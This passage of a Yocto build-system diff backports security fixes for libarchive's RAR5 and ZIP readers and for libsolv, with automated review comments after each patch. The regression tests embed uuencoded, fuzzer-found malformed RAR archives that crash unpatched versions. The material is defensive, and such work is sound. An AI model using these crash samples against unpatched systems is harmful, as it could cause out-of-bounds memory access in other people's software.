+ uint16_t num;
+
+- if((rar->bits.in_addr + 6) >= rar->cstate.cur_block_size) {
+- /* Truncated data, can't continue. */
+- archive_set_error(&a->archive,
+- ARCHIVE_ERRNO_FILE_FORMAT,
+- "Truncated data in huffman tables (#2)");
+- return ARCHIVE_FATAL;
+- }
+-
+ ret = decode_number(a, &rar->cstate.bd, p, &num);
+ if(ret != ARCHIVE_OK) {
+ archive_set_error(&a->archive,
+@@ -2561,8 +2571,8 @@ static int parse_tables(struct archive_r
+ /* 16..17: repeat previous code */
+ uint16_t n;
+
+- if(ARCHIVE_OK != read_bits_16(rar, p, &n))
+- return ARCHIVE_EOF;
++ if(ARCHIVE_OK != (ret = read_bits_16(a, rar, p, &n)))
++ return ret;
+
+ if(num == 16) {
+ n >>= 13;
+@@ -2590,8 +2600,8 @@ static int parse_tables(struct archive_r
+ /* other codes: fill with zeroes `n` times */
+ uint16_t n;
+
+- if(ARCHIVE_OK != read_bits_16(rar, p, &n))
+- return ARCHIVE_EOF;
++ if(ARCHIVE_OK != (ret = read_bits_16(a, rar, p, &n)))
++ return ret;
+
+ if(num == 18) {
+ n >>= 13;
+@@ -2707,22 +2717,22 @@ static int parse_block_header(struct arc
+ }
+
+ /* Convenience function used during filter processing. */
+-static int parse_filter_data(struct rar5* rar, const uint8_t* p,
+- uint32_t* filter_data)
++static int parse_filter_data(struct archive_read* a, struct rar5* rar,
++ const uint8_t* p, uint32_t* filter_data)
+ {
+- int i, bytes;
++ int i, bytes, ret;
+ uint32_t data = 0;
+
+- if(ARCHIVE_OK != read_consume_bits(rar, p, 2, &bytes))
+- return ARCHIVE_EOF;
++ if(ARCHIVE_OK != (ret = read_consume_bits(a, rar, p, 2, &bytes)))
++ return ret;
+
+ bytes++;
+
+ for(i = 0; i < bytes; i++) {
+ uint16_t byte;
+
+- if(ARCHIVE_OK != read_bits_16(rar, p, &byte)) {
+- return ARCHIVE_EOF;
++ if(ARCHIVE_OK != (ret = read_bits_16(a, rar, p, &byte))) {
++ return ret;
+ }
+
+ /* Cast to uint32_t will ensure the shift operation will not
+@@ -2765,16 +2775,17 @@ static int parse_filter(struct archive_r
+ uint16_t filter_type;
+ struct filter_info* filt = NULL;
+ struct rar5* rar = get_context(ar);
++ int ret;
+
+ /* Read the parameters from the input stream. */
+- if(ARCHIVE_OK != parse_filter_data(rar, p, &block_start))
+- return ARCHIVE_EOF;
++ if(ARCHIVE_OK != (ret = parse_filter_data(ar, rar, p, &block_start)))
++ return ret;
+
+- if(ARCHIVE_OK != parse_filter_data(rar, p, &block_length))
+- return ARCHIVE_EOF;
++ if(ARCHIVE_OK != (ret = parse_filter_data(ar, rar, p, &block_length)))
++ return ret;
+
+- if(ARCHIVE_OK != read_bits_16(rar, p, &filter_type))
+- return ARCHIVE_EOF;
++ if(ARCHIVE_OK != (ret = read_bits_16(ar, rar, p, &filter_type)))
++ return ret;
+
+ filter_type >>= 13;
+ skip_bits(rar, 3);
+@@ -2814,8 +2825,8 @@ static int parse_filter(struct archive_r
+ if(filter_type == FILTER_DELTA) {
+ int channels;
+
+- if(ARCHIVE_OK != read_consume_bits(rar, p, 5, &channels))
+- return ARCHIVE_EOF;
++ if(ARCHIVE_OK != (ret = read_consume_bits(ar, rar, p, 5, &channels)))
++ return ret;
+
+ filt->channels = channels + 1;
+ }
+@@ -2823,10 +2834,11 @@ static int parse_filter(struct archive_r
+ return ARCHIVE_OK;
+ }
+
+-static int decode_code_length(struct rar5* rar, const uint8_t* p,
+- uint16_t code)
++static int decode_code_length(struct archive_read* a, struct rar5* rar,
++ const uint8_t* p, uint16_t code)
+ {
+ int lbits, length = 2;
++
+ if(code < 8) {
+ lbits = 0;
+ length += code;
+@@ -2838,7 +2850,7 @@ static int decode_code_length(struct rar
+ if(lbits > 0) {
+ int add;
+
+- if(ARCHIVE_OK != read_consume_bits(rar, p, lbits, &add))
++ if(ARCHIVE_OK != read_consume_bits(a, rar, p, lbits, &add))
+ return -1;
+
+ length += add;
+@@ -2933,7 +2945,7 @@ static int do_uncompress_block(struct ar
+ continue;
+ } else if(num >= 262) {
+ uint16_t dist_slot;
+- int len = decode_code_length(rar, p, num - 262),
++ int len = decode_code_length(a, rar, p, num - 262),
+ dbits,
+ dist = 1;
+
+@@ -2975,12 +2987,12 @@ static int do_uncompress_block(struct ar
+ uint16_t low_dist;
+
+ if(dbits > 4) {
+- if(ARCHIVE_OK != read_bits_32(
+- rar, p, &add)) {
++ if(ARCHIVE_OK != (ret = read_bits_32(
++ a, rar, p, &add))) {
+ /* Return EOF if we
+ * can't read more
+ * data. */
+- return ARCHIVE_EOF;
++ return ret;
+ }
+
+ skip_bits(rar, dbits - 4);
+@@ -3015,11 +3027,11 @@ static int do_uncompress_block(struct ar
+ /* dbits is one of [0,1,2,3] */
+ int add;
+
+- if(ARCHIVE_OK != read_consume_bits(rar,
+- p, dbits, &add)) {
++ if(ARCHIVE_OK != (ret = read_consume_bits(a, rar,
++ p, dbits, &add))) {
+ /* Return EOF if we can't read
+ * more data. */
+- return ARCHIVE_EOF;
++ return ret;
+ }
+
+ dist += add;
+@@ -3076,7 +3088,11 @@ static int do_uncompress_block(struct ar
+ return ARCHIVE_FATAL;
+ }
+
+- len = decode_code_length(rar, p, len_slot);
++ len = decode_code_length(a, rar, p, len_slot);
++ if (len == -1) {
++ return ARCHIVE_FATAL;
++ }
++
+ rar->cstate.last_len = len;
+
+ if(ARCHIVE_OK != copy_string(a, len, dist))
+--- a/libarchive/test/test_read_format_rar5.c
++++ b/libarchive/test/test_read_format_rar5.c
+@@ -1271,3 +1271,20 @@ DEFINE_TEST(test_read_format_rar5_block_
+
+ EPILOGUE();
+ }
++
++DEFINE_TEST(test_read_format_rar5_decode_number_out_of_bounds_read)
++{
++ /* oss fuzz 30448 */
++
++ char buf[4096];
++ PROLOGUE("test_read_format_rar5_decode_number_out_of_bounds_read.rar");
++
++ /* Return codes of those calls are ignored, because this sample file
++ * is invalid. However, the unpacker shouldn't produce any SIGSEGV
++ * errors during processing. */
++
++ (void) archive_read_next_header(a, &ae);
++ while(0 < archive_read_data(a, buf, sizeof(buf))) {}
++
++ EPILOGUE();
++}
+--- /dev/null
++++ b/libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu
+@@ -0,0 +1,10 @@
++begin 644 test_read_format_rar5_decode_number_out_of_bounds_read.rar
++M4F%R(1H'`0!3@"KT`P+G(@(0("`@@`L!!"`@("`@(($D_[BJ2"!::7!)210V
++M+0#ZF#)Q!`+>YPW_("`@("``_R````````````````````````````!__P``
++M``````!T72`@/EW_(/\@("`@("`@("`@("`@("`@("`@("`@("`@(/\@("`@
++M("`@("#_("`@("`@("`@("`@("`@("`@("`@("`@("#_("`@("`@("`@_R`@
++M("`@("`@("`@("`@("`@("`@("`@("`@_R`@("`@("`@(/\@("`@("`@("`@
++M("`@("`@("`@("`@("`@(/\@("`@("`@("#_("`@("`@("`@("`@("`@("`@
++E("`@("`@("#_("`@("`@("`@_R`@("`@("`@("`@("`@("`@(```
++`
++end
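Review bot: The range check added to `read_bits_32()` and `read_bits_16()` only proves that `p[rar->bits.in_addr]` lies inside the block, while the next lines read up to `in_addr + 3` (32-bit) and `in_addr + 2` (16-bit). The same patch removes the `(rar->bits.in_addr + 6) >= rar->cstate.cur_block_size` guard from `parse_tables()`, so unless the buffer behind `p` is guaranteed to extend past `cur_block_size` (not visible here), the last bytes of a block can still be read out of range. Checking the highest index touched would close that, e.g. `if(rar->bits.in_addr + 3 >= rar->cstate.cur_block_size) {` in `read_bits_32()` and `+ 2` in `read_bits_16()`, after confirming that valid streams never end inside that tail. Separately, `ARCHIVE_ERRNO_PROGRAMMER` labels malformed input as a caller bug where `ARCHIVE_ERRNO_FILE_FORMAT` (used by the removed check) fits better, and the two "Return EOF if we can't read more data" comments in `do_uncompress_block()` no longer match the `return ret;` beneath them.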
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-2.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-2.patch
new file mode 100644
index 0000000000..b5da44ec7b
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-2.patch
@@ -0,0 +1,121 @@
+From 17f4e83c0f0fc3bacf4b2bbacb01f987bb5aff5f Mon Sep 17 00:00:00 2001
+From: Grzegorz Antoniak <ga@anadoxin.org>
+Date: Fri, 12 Feb 2021 20:18:31 +0100
+Subject: [PATCH] RAR5 reader: fix invalid memory access in some files
+
+RAR5 reader uses several variables to manage the window buffer during
+extraction: the buffer itself (`window_buf`), the current size of the
+window buffer (`window_size`), and a helper variable (`window_mask`)
+that is used to constrain read and write offsets to the window buffer.
+
+Some specially crafted files can force the unpacker to update the
+`window_mask` variable to a value that is out of sync with current
+buffer size. If the `window_mask` will be bigger than the actual buffer
+size, then an invalid access operation can happen (SIGSEGV).
+
+This commit ensures that if the `window_size` and `window_mask` will be
+changed, the window buffer will be reallocated to the proper size, so no
+invalid memory operation should be possible.
+
+This commit contains a test file from OSSFuzz #30442.
+
+Upstream-Status: Backport [https://git.launchpad.net/ubuntu/+source/libarchive/plain/debian/patches/CVE-2021-36976-2.patch?h=applied/3.4.3-2ubuntu0.1]
+CVE: CVE-2021-36976
+Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com>
+
+---
+ Makefile.am | 1 +
+ libarchive/archive_read_support_format_rar5.c | 27 ++++++++++++++-----
+ libarchive/test/test_read_format_rar5.c | 17 ++++++++++++
+ ...mat_rar5_window_buf_and_size_desync.rar.uu | 11 ++++++++
+ 4 files changed, 50 insertions(+), 6 deletions(-)
+ create mode 100644 libarchive/test/test_read_format_rar5_window_buf_and_size_desync.rar.uu
+
+--- a/Makefile.am
++++ b/Makefile.am
+@@ -884,6 +884,7 @@ libarchive_test_EXTRA_DIST=\
+ libarchive/test/test_read_format_rar5_different_winsize_on_merge.rar.uu \
+ libarchive/test/test_read_format_rar5_block_size_is_too_small.rar.uu \
+ libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu \
++ libarchive/test/test_read_format_rar5_window_buf_and_size_desync.rar.uu \
+ libarchive/test/test_read_format_raw.bufr.uu \
+ libarchive/test/test_read_format_raw.data.gz.uu \
+ libarchive/test/test_read_format_raw.data.Z.uu \
+--- a/libarchive/archive_read_support_format_rar5.c
++++ b/libarchive/archive_read_support_format_rar5.c
+@@ -1730,14 +1730,29 @@ static int process_head_file(struct arch
+ }
+ }
+
+- /* If we're currently switching volumes, ignore the new definition of
+- * window_size. */
+- if(rar->cstate.switch_multivolume == 0) {
+- /* Values up to 64M should fit into ssize_t on every
+- * architecture. */
+- rar->cstate.window_size = (ssize_t) window_size;
++ if(rar->cstate.window_size < (ssize_t) window_size &&
++ rar->cstate.window_buf)
++ {
++ /* If window_buf has been allocated before, reallocate it, so
++ * that its size will match new window_size. */
++
++ uint8_t* new_window_buf =
++ realloc(rar->cstate.window_buf, window_size);
++
++ if(!new_window_buf) {
++ archive_set_error(&a->archive, ARCHIVE_ERRNO_PROGRAMMER,
++ "Not enough memory when trying to realloc the window "
++ "buffer.");
++ return ARCHIVE_FATAL;
++ }
++
++ rar->cstate.window_buf = new_window_buf;
+ }
+
++ /* Values up to 64M should fit into ssize_t on every
++ * architecture. */
++ rar->cstate.window_size = (ssize_t) window_size;
++
+ if(rar->file.solid > 0 && rar->file.solid_window_size == 0) {
+ /* Solid files have to have the same window_size across
+ whole archive. Remember the window_size parameter
+--- a/libarchive/test/test_read_format_rar5.c
++++ b/libarchive/test/test_read_format_rar5.c
+@@ -1206,6 +1206,23 @@ DEFINE_TEST(test_read_format_rar5_differ
+ EPILOGUE();
+ }
+
++DEFINE_TEST(test_read_format_rar5_window_buf_and_size_desync)
++{
++ /* oss fuzz 30442 */
++
++ char buf[4096];
++ PROLOGUE("test_read_format_rar5_window_buf_and_size_desync.rar");
++
++ /* Return codes of those calls are ignored, because this sample file
++ * is invalid. However, the unpacker shouldn't produce any SIGSEGV
++ * errors during processing. */
++
++ (void) archive_read_next_header(a, &ae);
++ while(0 < archive_read_data(a, buf, 46)) {}
++
++ EPILOGUE();
++}
++
+ DEFINE_TEST(test_read_format_rar5_arm_filter_on_window_boundary)
+ {
+ char buf[4096];
+--- /dev/null
++++ b/libarchive/test/test_read_format_rar5_window_buf_and_size_desync.rar.uu
+@@ -0,0 +1,11 @@
++begin 644 test_read_format_rar5_window_buf_and_size_desync.rar
++M4F%R(1H'`0`]/-[E`@$`_P$`1#[Z5P("`PL``BXB"?\`!(@B@0`)6.-AF?_1
++M^0DI&0GG(F%R(0<:)`!3@"KT`P+G(@O_X[\``#&``(?!!0$$[:L``$.M*E)A
++M<B$`O<\>P0";/P1%``A*2DI*2DYQ<6TN9'%*2DI*2DI*``!D<F--``````"Z
++MNC*ZNKJZNFYO=&%I;+JZNKJZNKJZOKJZ.KJZNKJZNKKZU@4%````0$!`0$!`
++M0$!`0$!`0$!`0$#_________/T#`0$!`0$!`-UM`0$!`0$!`0$!`0$!`0$!`
++M0$!`0'!,J+:O!IZ-WN4'@`!3*F0`````````````````````````````````
++M``````````````#T`P)287(A&@<!`%.`*O0#`N<B`_,F@`'[__\``(`4`01S
++J'`/H/O\H@?\D`#O9GIZ>GN<B"_]%``(``&1RGIZ>GIZ>8_^>GE/_``!.
++`
++end
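Review bot: After the new `realloc(rar->cstate.window_buf, window_size)` in `process_head_file()` the bytes between the old `window_size` and the new one are uninitialised, and nothing in the hunk clears them. If the decoder later reads window offsets it has not written yet, stale heap contents could reach the extracted output. Zeroing the grown tail keeps it consistent with a freshly allocated window, assuming that one is zero-filled (its allocation is not visible here): `memset(new_window_buf + rar->cstate.window_size, 0, window_size - rar->cstate.window_size);`. The allocation failure is also reported with `ARCHIVE_ERRNO_PROGRAMMER`; `ENOMEM` would describe it accurately. The function body continues outside the hunk.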
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-3.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-3.patch
new file mode 100644
index 0000000000..0e1549f229
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-3.patch
@@ -0,0 +1,93 @@
+From 313bcd7ac547f7cc25945831f63507420c0874d7 Mon Sep 17 00:00:00 2001
+From: Grzegorz Antoniak <ga@anadoxin.org>
+Date: Sat, 13 Feb 2021 10:13:22 +0100
+Subject: [PATCH] RAR5 reader: add more checks for invalid extraction
+ parameters
+
+Some specially crafted files declare invalid extraction parameters that
+can confuse the RAR5 reader.
+
+One of the arguments is the declared window size parameter that the
+archive file can declare for each file stored in the archive. Some
+crafted files declare window size equal to 0, which is clearly wrong.
+
+This commit adds additional safety checks decreasing the tolerance of
+the RAR5 format.
+
+This commit also contains OSSFuzz sample #30459.
+---
+ Makefile.am | 1 +
+ libarchive/archive_read_support_format_rar5.c | 10 ++++++++++
+ libarchive/test/test_read_format_rar5.c | 19 +++++++++++++++++++
+ ...t_rar5_bad_window_sz_in_mltarc_file.rar.uu | 7 +++++++
+ 4 files changed, 37 insertions(+)
+ create mode 100644 libarchive/test/test_read_format_rar5_bad_window_sz_in_mltarc_file.rar.uu
+
+Upstream-Status: Backport [https://github.com/libarchive/libarchive/pull/1493/commits/313bcd7ac547f7cc25945831f63507420c0874d7]
+CVE: CVE-2021-36976
+Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com>
+
+--- libarchive-3.4.2.orig/Makefile.am
++++ libarchive-3.4.2/Makefile.am
+@@ -882,6 +882,7 @@ libarchive_test_EXTRA_DIST=\
+ libarchive/test/test_read_format_rar5_block_size_is_too_small.rar.uu \
+ libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu \
+ libarchive/test/test_read_format_rar5_window_buf_and_size_desync.rar.uu \
++ libarchive/test/test_read_format_rar5_bad_window_sz_in_mltarc_file.rar.uu \
+ libarchive/test/test_read_format_raw.bufr.uu \
+ libarchive/test/test_read_format_raw.data.gz.uu \
+ libarchive/test/test_read_format_raw.data.Z.uu \
+--- libarchive-3.4.2.orig/libarchive/archive_read_support_format_rar5.c
++++ libarchive-3.4.2/libarchive/archive_read_support_format_rar5.c
+@@ -3637,6 +3637,16 @@ static int do_uncompress_file(struct arc
+ rar->cstate.initialized = 1;
+ }
+
++ /* Don't allow extraction if window_size is invalid. */
++ if(rar->cstate.window_size == 0) {
++ archive_set_error(&a->archive,
++ ARCHIVE_ERRNO_FILE_FORMAT,
++ "Invalid window size declaration in this file");
++
++ /* This should never happen in valid files. */
++ return ARCHIVE_FATAL;
++ }
++
+ if(rar->cstate.all_filters_applied == 1) {
+ /* We use while(1) here, but standard case allows for just 1
+ * iteration. The loop will iterate if process_block() didn't
+--- libarchive-3.4.2.orig/libarchive/test/test_read_format_rar5.c
++++ libarchive-3.4.2/libarchive/test/test_read_format_rar5.c
+@@ -1305,3 +1305,22 @@ DEFINE_TEST(test_read_format_rar5_decode
+
+ EPILOGUE();
+ }
++
++DEFINE_TEST(test_read_format_rar5_bad_window_size_in_multiarchive_file)
++{
++ /* oss fuzz 30459 */
++
++ char buf[4096];
++ PROLOGUE("test_read_format_rar5_bad_window_sz_in_mltarc_file.rar");
++
++ /* This file is damaged, so those functions should return failure.
++ * Additionally, SIGSEGV shouldn't be raised during execution
++ * of those functions. */
++
++ (void) archive_read_next_header(a, &ae);
++ while(0 < archive_read_data(a, buf, sizeof(buf))) {}
++ (void) archive_read_next_header(a, &ae);
++ while(0 < archive_read_data(a, buf, sizeof(buf))) {}
++
++ EPILOGUE();
++}
+--- /dev/null
++++ libarchive-3.4.2/libarchive/test/test_read_format_rar5_bad_window_sz_in_mltarc_file.rar.uu
+@@ -0,0 +1,7 @@
++begin 644 test_read_format_rar5_bad_window_size_in_multiarchive_file.rar
++M4F%R(1H'`0`]/-[E`@$`_R`@1#[Z5P("`PL`("`@@"(`"?\@("#___\@("`@
++M("`@("`@("`@4X`J]`,"YR(#$($@("`@``$@("`@@<L0("`@("`@("`@("`@
++M("`@(""LCTJA`P$%`B`@`2!3@"KT`P+G(@,@("`@_P,!!B`@(/___R`@(('+
++5$"`OX2`@[.SL[.S_("`@("`@("`@
++`
++end
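Review bot: The uuencoded fixture is stored as `test_read_format_rar5_bad_window_sz_in_mltarc_file.rar.uu` and `PROLOGUE()` requests `test_read_format_rar5_bad_window_sz_in_mltarc_file.rar`, but its `begin 644` line still names `test_read_format_rar5_bad_window_size_in_multiarchive_file.rar`. Whether the test harness takes the output name from the `begin` line or from the requested file name is not visible here; if it is the former, the test would not find its input and the regression would go unexercised. Making the header match, `begin 644 test_read_format_rar5_bad_window_sz_in_mltarc_file.rar`, removes the doubt.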
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2022-26280.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2022-26280.patch
new file mode 100644
index 0000000000..501fcc5848
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2022-26280.patch
@@ -0,0 +1,29 @@
+From cfaa28168a07ea4a53276b63068f94fce37d6aff Mon Sep 17 00:00:00 2001
+From: Tim Kientzle <kientzle@acm.org>
+Date: Thu, 24 Mar 2022 10:35:00 +0100
+Subject: [PATCH] ZIP reader: fix possible out-of-bounds read in
+ zipx_lzma_alone_init()
+
+Fixes #1672
+
+CVE: CVE-2022-26280
+Upstream-Status: Backport [https://github.com/libarchive/libarchive/commit/cfaa28168a07ea4a53276b63068f94fce37d6aff]
+Signed-off-by: Andrej Valek <andrej.valek@siemens.com>
+
+---
+ libarchive/archive_read_support_format_zip.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/libarchive/archive_read_support_format_zip.c b/libarchive/archive_read_support_format_zip.c
+index 38ada70b5..9d6c900b2 100644
+--- a/libarchive/archive_read_support_format_zip.c
++++ b/libarchive/archive_read_support_format_zip.c
+@@ -1667,7 +1667,7 @@ zipx_lzma_alone_init(struct archive_read *a, struct zip *zip)
+ */
+
+ /* Read magic1,magic2,lzma_params from the ZIPX stream. */
+- if((p = __archive_read_ahead(a, 9, NULL)) == NULL) {
++ if(zip->entry_bytes_remaining < 9 || (p = __archive_read_ahead(a, 9, NULL)) == NULL) {
+ archive_set_error(&a->archive, ARCHIVE_ERRNO_FILE_FORMAT,
+ "Truncated lzma data");
+ return (ARCHIVE_FATAL);
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2022-36227.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2022-36227.patch
new file mode 100644
index 0000000000..980a0e884a
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2022-36227.patch
@@ -0,0 +1,43 @@
+From 6311080bff566fcc5591dadfd78efb41705b717f Mon Sep 17 00:00:00 2001
+From: obiwac <obiwac@gmail.com>
+Date: Fri, 22 Jul 2022 22:41:10 +0200
+Subject: [PATCH] CVE-2022-36227
+
+libarchive: CVE-2022-36227 Handle a `calloc` returning NULL (fixes #1754)
+
+Upstream-Status: Backport [https://github.com/libarchive/libarchive/commit/bff38efe8c110469c5080d387bec62a6ca15b1a5]
+CVE: CVE-2022-36227
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com
+---
+ libarchive/archive_write.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/libarchive/archive_write.c b/libarchive/archive_write.c
+index 98a55fb..7fe88b6 100644
+--- a/libarchive/archive_write.c
++++ b/libarchive/archive_write.c
+@@ -211,6 +211,10 @@ __archive_write_allocate_filter(struct archive *_a)
+ struct archive_write_filter *f;
+
+ f = calloc(1, sizeof(*f));
++
++ if (f == NULL)
++ return (NULL);
++
+ f->archive = _a;
+ f->state = ARCHIVE_WRITE_FILTER_STATE_NEW;
+ if (a->filter_first == NULL)
+@@ -527,6 +531,10 @@ archive_write_open(struct archive *_a, void *client_data,
+ a->client_data = client_data;
+
+ client_filter = __archive_write_allocate_filter(_a);
++
++ if (client_filter == NULL)
++ return (ARCHIVE_FATAL);
++
+ client_filter->open = archive_write_client_open;
+ client_filter->write = archive_write_client_write;
+ client_filter->close = archive_write_client_close;
+--
+2.25.1
+
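Review bot: The new NULL path in archive_write_open() returns ARCHIVE_FATAL without recording an error, so a caller that inspects the archive's error state after an allocation failure may find no message or errno. Setting one before the return, e.g. `archive_set_error(&a->archive, ENOMEM, "Out of memory");`, would keep the failure diagnosable (confirm ENOMEM is in scope in archive_write.c). __archive_write_allocate_filter() can now return NULL, but archive_write_open() is the only caller updated in this patch. Any other callers are outside the hunks and should be checked for the same unchecked dereference. The Signed-off-by trailer in the patch header is also missing its closing `>`.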
diff --git a/meta/recipes-extended/libarchive/libarchive_3.4.2.bb b/meta/recipes-extended/libarchive/libarchive_3.4.2.bb
index 0ab40fc096..728eedc401 100644
--- a/meta/recipes-extended/libarchive/libarchive_3.4.2.bb
+++ b/meta/recipes-extended/libarchive/libarchive_3.4.2.bb
@@ -32,11 +32,23 @@ PACKAGECONFIG[mbedtls] = "--with-mbedtls,--without-mbedtls,mbedtls,"
EXTRA_OECONF += "--enable-largefile"
-SRC_URI = "http://libarchive.org/downloads/libarchive-${PV}.tar.gz"
+SRC_URI = "http://libarchive.org/downloads/libarchive-${PV}.tar.gz \
+ file://CVE-2021-36976-1.patch \
+ file://CVE-2021-36976-2.patch \
+ file://CVE-2021-36976-3.patch \
+ file://CVE-2021-23177.patch \
+ file://CVE-2021-31566-01.patch \
+ file://CVE-2021-31566-02.patch \
+ file://CVE-2022-26280.patch \
+ file://CVE-2022-36227.patch \
+"
SRC_URI[md5sum] = "d953ed6b47694dadf0e6042f8f9ff451"
SRC_URI[sha256sum] = "b60d58d12632ecf1e8fad7316dc82c6b9738a35625746b47ecdcaf4aed176176"
+# upstream-wontfix: upstream has documented that reported function is not thread-safe
+CVE_CHECK_WHITELIST += "CVE-2023-30571"
+
inherit autotools update-alternatives pkgconfig
CPPFLAGS += "-I${WORKDIR}/extra-includes"
diff --git a/meta/recipes-extended/libnsl/libnsl2_git.bb b/meta/recipes-extended/libnsl/libnsl2_git.bb
index 28c84af7ad..cbb38674b9 100644
--- a/meta/recipes-extended/libnsl/libnsl2_git.bb
+++ b/meta/recipes-extended/libnsl/libnsl2_git.bb
@@ -14,7 +14,7 @@ PV = "1.2.0+git${SRCPV}"
SRCREV = "4a062cf4180d99371198951e4ea5b4550efd58a3"
-SRC_URI = "git://github.com/thkukuk/libnsl \
+SRC_URI = "git://github.com/thkukuk/libnsl;branch=master;protocol=https \
"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-extended/libnss-nis/libnss-nis.bb b/meta/recipes-extended/libnss-nis/libnss-nis.bb
index a1d914e871..0ec64544be 100644
--- a/meta/recipes-extended/libnss-nis/libnss-nis.bb
+++ b/meta/recipes-extended/libnss-nis/libnss-nis.bb
@@ -13,11 +13,11 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c"
SECTION = "libs"
DEPENDS += "libtirpc libnsl2"
-PV = "3.1+git${SRCPV}"
+PV = "3.2"
-SRCREV = "062f31999b35393abf7595cb89dfc9590d5a42ad"
+SRCREV = "cd0d391af9535b56e612ed227c1b89be269f3d59"
-SRC_URI = "git://github.com/thkukuk/libnss_nis \
+SRC_URI = "git://github.com/thkukuk/libnss_nis;branch=master;protocol=https \
"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-extended/libsolv/files/CVE-2021-3200.patch b/meta/recipes-extended/libsolv/files/CVE-2021-3200.patch
new file mode 100644
index 0000000000..fa577fd533
--- /dev/null
+++ b/meta/recipes-extended/libsolv/files/CVE-2021-3200.patch
@@ -0,0 +1,82 @@
+From 0077ef29eb46d2e1df2f230fc95a1d9748d49dec Mon Sep 17 00:00:00 2001
+From: Michael Schroeder <mls@suse.de>
+Date: Mon, 14 Dec 2020 11:12:00 +0100
+Subject: [PATCH] testcase_read: error out if repos are added or the system is
+ changed too late
+
+We must not add new solvables after the considered map was created, the solver
+was created, or jobs were added. We may not changed the system after jobs have
+been added.
+
+(Jobs may point inside the whatproviedes array, so we must not invalidate this
+area.)
+
+Upstream-Status: Backport [https://github.com/openSUSE/libsolv/commit/0077ef29eb46d2e1df2f230fc95a1d9748d49dec]
+CVE: CVE-2021-3200
+CVE: CVE-2021-33928
+CVE: CVE-2021-33929
+CVE: CVE-2021-33930
+CVE: CVE-2021-33938
+CVE: CVE-2021-44568
+CVE: CVE-2021-44569
+CVE: CVE-2021-44570
+CVE: CVE-2021-44571
+CVE: CVE-2021-44573
+CVE: CVE-2021-44574
+CVE: CVE-2021-44575
+CVE: CVE-2021-44576
+CVE: CVE-2021-44577
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+---
+ ext/testcase.c | 21 +++++++++++++++++++++
+ 1 file changed, 21 insertions(+)
+
+diff --git a/ext/testcase.c b/ext/testcase.c
+index 0be7a213..8fb6d793 100644
+--- a/ext/testcase.c
++++ b/ext/testcase.c
+@@ -1991,6 +1991,7 @@ testcase_read(Pool *pool, FILE *fp, const char *testcase, Queue *job, char **res
+ Id *genid = 0;
+ int ngenid = 0;
+ Queue autoinstq;
++ int oldjobsize = job ? job->count : 0;
+
+ if (resultp)
+ *resultp = 0;
+@@ -2065,6 +2066,21 @@ testcase_read(Pool *pool, FILE *fp, const char *testcase, Queue *job, char **res
+ int prio, subprio;
+ const char *rdata;
+
++ if (pool->considered)
++ {
++ pool_error(pool, 0, "testcase_read: cannot add repos after packages were disabled");
++ continue;
++ }
++ if (solv)
++ {
++ pool_error(pool, 0, "testcase_read: cannot add repos after the solver was created");
++ continue;
++ }
++ if (job && job->count != oldjobsize)
++ {
++ pool_error(pool, 0, "testcase_read: cannot add repos after jobs have been created");
++ continue;
++ }
+ prepared = 0;
+ if (!poolflagsreset)
+ {
+@@ -2125,6 +2141,11 @@ testcase_read(Pool *pool, FILE *fp, const char *testcase, Queue *job, char **res
+ int i;
+
+ /* must set the disttype before the arch */
++ if (job && job->count != oldjobsize)
++ {
++ pool_error(pool, 0, "testcase_read: cannot change the system after jobs have been created");
++ continue;
++ }
+ prepared = 0;
+ if (strcmp(pieces[2], "*") != 0)
+ {
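Review bot: The four guards added to testcase_read() only call `pool_error(pool, 0, ...)` and `continue`, so the offending line is skipped and parsing carries on, although the subject says "error out". Whether the caller ever sees a failure from testcase_read() is decided outside these hunks and should be confirmed. A short comment at the first guard would prevent misreading, for example `/* reject the line but keep parsing; the error is recorded in the pool */`. `oldjobsize` also deserves one at its declaration, such as `/* job count on entry; any growth means this testcase already queued jobs */`. Every later check depends on that snapshot being taken before the read loop.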
diff --git a/meta/recipes-extended/libsolv/libsolv_0.7.10.bb b/meta/recipes-extended/libsolv/libsolv_0.7.10.bb
index 265a27c00d..2c2aedc32c 100644
--- a/meta/recipes-extended/libsolv/libsolv_0.7.10.bb
+++ b/meta/recipes-extended/libsolv/libsolv_0.7.10.bb
@@ -1,4 +1,5 @@
SUMMARY = "Library for solving packages and reading repositories"
+DESCRIPTION = "This is libsolv, a free package dependency solver using a satisfiability algorithm for solving packages and reading repositories"
HOMEPAGE = "https://github.com/openSUSE/libsolv"
BUGTRACKER = "https://github.com/openSUSE/libsolv/issues"
SECTION = "devel"
@@ -7,7 +8,8 @@ LIC_FILES_CHKSUM = "file://LICENSE.BSD;md5=62272bd11c97396d4aaf1c41bc11f7d8"
DEPENDS = "expat zlib"
-SRC_URI = "git://github.com/openSUSE/libsolv.git \
+SRC_URI = "git://github.com/openSUSE/libsolv.git;branch=master;protocol=https \
+ file://CVE-2021-3200.patch \
"
SRCREV = "605dd2645ef899e2b7c95709476fb51e28d7e378"
